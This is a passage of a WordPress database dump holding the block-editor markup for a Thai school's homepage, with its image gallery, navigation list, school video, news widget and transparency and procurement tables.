(135,1,'2024-07-29 18:57:11','2024-07-29 11:57:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 